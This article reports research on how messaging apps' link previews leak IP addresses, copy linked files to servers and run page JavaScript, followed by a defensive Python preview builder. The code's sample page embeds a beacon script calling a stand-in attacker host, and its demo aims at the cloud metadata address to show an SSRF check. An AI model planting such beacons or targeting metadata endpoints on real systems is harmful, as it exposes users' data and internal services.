Almost all popular messaging apps offer link previews, which let users know the content of a URL in advance. However, security researchers Talal Haj Bakry and Tommy Mysk have discovered that these link previews can expose user data in both iOS and Android apps.
When you send any link through a messaging app like Messenger, WhatsApp, and even iMessage, the app generates a preview of that link which usually contains an image, title, and sometimes a short text. Although this is an extremely useful feature, Bakry and Mysk have raised some privacy concerns about it.
Let’s take a step back and think about how a preview gets generated. How does the app know what to show in the summary? Something has to open the link and read the page, without the user ever tapping it. Is that safe? What if the page behind the link is hostile? What if the link points at a very large file that you would not want downloaded in the background, eating into your data plan?

The researchers explain that apps answer this in different ways, and some ways are safer than others. iMessage and WhatsApp, for example, fetch the URL on the sender’s device at the moment the link is entered and send the generated preview along with the message. The sender sees exactly what will be shared, has already chosen to share that link, and the recipient’s device never contacts the site.

Reddit and other apps, however, generate the preview on the receiver’s device. As soon as a link arrives, the app opens the URL in the background and builds the preview, no tap required. With this approach, a stranger can send you a link to a server they control and, from the request your phone makes, learn your IP address, and with it your approximate location, without you ever opening the link.
A third approach puts even more at risk. As the researchers point out, apps like Discord, Messenger, Instagram, and Twitter generate link previews on a remote server rather than on either device: the server receives the link, fetches it, and returns the preview to the clients. For users, that means a link in a message is handled by the server in the clear, outside any end-to-end encryption the app may offer, and anyone with access to those servers can see which links were exchanged and what was fetched from them.
They also found that some of these apps download the linked resource automatically, even when it is a large file. Facebook Messenger, for instance, will pull a file of up to 20MB with no user interaction. That is far more than a preview needs: the title, description and thumbnail come from a handful of meta tags in the page’s head, so a few kilobytes would do. It also means that a file you link to may be copied to the company’s servers, outside the app’s encryption, because that is where the preview is built.
In one test, the researchers obtained the IP addresses of recipients simply by sending them links through an app that builds the preview on the receiving device. They also warn that some of the server-side preview generators execute JavaScript found on the fetched page, so a crafted page is not merely read for its tags but gets to run code inside the company’s preview infrastructure.
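The problems above come down to how the preview fetcher behaves: what it is willing to fetch, how much of it, and whether it runs the page. The following is an added example, not code from the researchers or from any of the apps named in this article, of a preview builder that follows the safer principles implied here: it refuses non-HTML resources before transferring a body, reads at most the first 64 KiB (the head of the page is all a preview needs), treats scripts as inert text, and rejects links to private or loopback addresses so the fetcher cannot be aimed at internal services. The hostnames (example.invalid, attacker.invalid), the sample page and the response headers are constructed for the demo; where the fetch runs (sender, receiver or server) is a separate design choice that this code does not decide.

```python
"""Hardened link-preview builder (added example; not from the research or any app)."""
from html.parser import HTMLParser
from ipaddress import ip_address
from urllib.parse import urlparse

# A preview needs only the <head> (title and og:* meta tags), so cap the body read.
MAX_PREVIEW_BYTES = 64 * 1024
HTML_TYPES = {"text/html", "application/xhtml+xml"}


class _HeadMetaParser(HTMLParser):
    """Collects <title> and og:/twitter: <meta> tags; stops at </head>.

    Only markup is read. A <script> element is plain text to this parser, so
    page JavaScript is never executed, unlike with a headless-browser fetcher.
    """

    def __init__(self):
        super().__init__()
        self.meta = {}
        self.title_parts = []
        self._in_title = False
        self.done = False

    def handle_starttag(self, tag, attrs):
        if self.done:
            return
        a = dict(attrs)
        if tag == "meta":
            key = (a.get("property") or a.get("name") or "").lower()
            if key.startswith(("og:", "twitter:")) and a.get("content") is not None:
                self.meta.setdefault(key, a["content"].strip())
        elif tag == "title":
            self._in_title = True

    def handle_endtag(self, tag):
        if tag == "title":
            self._in_title = False
        elif tag == "head":
            self.done = True  # everything after </head> is ignored

    def handle_data(self, data):
        if self._in_title and not self.done:
            self.title_parts.append(data)


def target_is_allowed(url):
    """SSRF guard: only http(s), and no literal private/loopback/link-local IPs.
    Hostnames are not resolved here; a real fetcher must also check the resolved
    address and repeat the check on every redirect."""
    u = urlparse(url)
    if u.scheme not in ("http", "https") or not u.hostname:
        return False
    try:
        ip = ip_address(u.hostname)
    except ValueError:
        return True  # a hostname rather than an IP literal
    return not (ip.is_private or ip.is_loopback or ip.is_link_local or ip.is_reserved)


def build_preview(url, headers, body, max_bytes=MAX_PREVIEW_BYTES):
    """headers: response headers with lowercase names; body: the bytes received.
    Returns a preview dict, or a dict with 'error' when the fetch is abandoned."""
    if not target_is_allowed(url):
        return {"url": url, "error": "target not allowed"}
    ctype = headers.get("content-type", "").split(";")[0].strip().lower()
    if ctype not in HTML_TYPES:
        # A video, archive or document has no <head>: do not transfer it at all.
        return {"url": url, "error": f"not HTML ({ctype or 'unknown'}), body not fetched"}
    # Never buffer the whole resource; a real fetcher closes the socket here.
    head = body[:max_bytes].decode("utf-8", errors="replace")
    p = _HeadMetaParser()
    p.feed(head)
    p.close()
    return {
        "url": url,
        "title": p.meta.get("og:title") or "".join(p.title_parts).strip() or None,
        "description": p.meta.get("og:description"),
        "image": p.meta.get("og:image"),
        "bytes_read": min(len(body), max_bytes),
    }


# Constructed sample page: valid Open Graph tags followed by a script that a
# browser-based preview server would execute, and a body far larger than the cap.
SAMPLE_HTML = b"""<!doctype html><html><head>
<meta charset="utf-8"><title>Fallback title</title>
<meta property="og:title" content="Q3 design review">
<meta property="og:description" content="Internal draft, do not distribute">
<meta property="og:image" content="https://example.invalid/thumb.png">
<script>fetch("https://attacker.invalid/beacon?ua=" + navigator.userAgent)</script>
</head><body>""" + b"<p>padding</p>" * 20000 + b"</body></html>"
SAMPLE_HTML_HEADERS = {"content-type": "text/html; charset=utf-8"}

# Constructed sample: a link to a 2.6 GB video. Content-Type alone is enough to
# refuse it before a single byte of the body is transferred.
SAMPLE_BIG_HEADERS = {"content-type": "video/mp4", "content-length": "2600000000"}


def demo():
    page = build_preview("https://example.invalid/design", SAMPLE_HTML_HEADERS, SAMPLE_HTML)
    big = build_preview("https://example.invalid/big.mp4", SAMPLE_BIG_HEADERS, b"")
    internal = build_preview("http://169.254.169.254/latest/meta-data/", SAMPLE_HTML_HEADERS, b"")
    return page, big, internal


if __name__ == "__main__":
    for result in demo():
        print(result)
```

Running it shows the design document's title, description and thumbnail extracted from the first 64 KiB of a 280 KB page, the beacon script left untouched, the video refused without a body transfer, and the cloud metadata address rejected outright. Two things this example deliberately leaves open: the fetch still reveals the fetcher's IP address to the linked site, so it should run where the user has consented to that (for instance on the sender's device), and `Content-Length` is advisory only, which is why the byte cap is enforced on the read rather than trusted from the header.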
So that confidential design document you once shared as a OneDrive link, and later deleted because you no longer wanted it shared? A copy of it may still sit on one of these link-preview servers.
The team contacted the developers of the apps mentioned in the article to check how they plan to make link previews more secure. Until then, you can check the full research in detail on Mysk’s blog.